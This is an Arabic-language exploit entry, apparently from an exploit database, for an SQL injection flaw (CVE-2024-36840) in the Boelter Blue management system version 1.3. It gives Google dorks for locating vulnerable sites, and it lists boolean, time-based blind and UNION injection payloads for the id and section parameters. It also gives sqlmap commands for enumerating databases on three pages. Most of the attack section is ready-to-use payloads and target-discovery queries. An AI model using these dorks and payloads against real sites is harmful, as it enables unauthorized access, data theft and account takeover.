
# استغلال لـ: CVE-2024-36840: ثغرة حقن SQL في نظام إدارة Boelter Blue (الإصدار 1.3)
عنوان الاستغلال: ثغرة حقن SQL في نظام إدارة Boelter Blue (الإصدار 1.3)
دورك جوجل الأصلي: inurl:"Powered by Boelter Blue" (لم يعمل (صفر نتائج في البحث))
دورك جوجل بواسطة Theexploiters: intext:"Powered by Boelter Blue" (يعمل)
التاريخ: 2024-06-04
مؤلف الاستغلال: CBKB (DeadlyData, R4d1x)
الصفحة الرئيسية للبائع: Boelter Blue
رابط البرنامج: Google Play Store
الإصدار: 1.3
تم الاختبار على: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12
CVE: CVE-2024-36840
تم تحديد ثغرات متعددة لحقن SQL في نظام إدارة Boelter Blue (الإصدار 1.3). تسمح هذه الثغرات للمهاجمين بحقن وتنفيذ أوامر SQL عشوائية عبر معاملات مختلفة. قد يؤدي الاستغلال الناجح إلى وصول غير مصرح به، وسرقة البيانات، واحتمال الاستيلاء على الحسابات.
المعامل: id (GET)
id=10071 AND 4036=4036النوع: أعمى قائم على الوقت (Time-based blind)
id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)النوع: استعلام UNION
id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...news_details.php?id
https://www.example.com/news_details.php?id=10071sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
services.php?section
https://www.example.com/services.php?section=5081sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
location_details.php?id
https://www.example.com/location_details.php?id=836sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs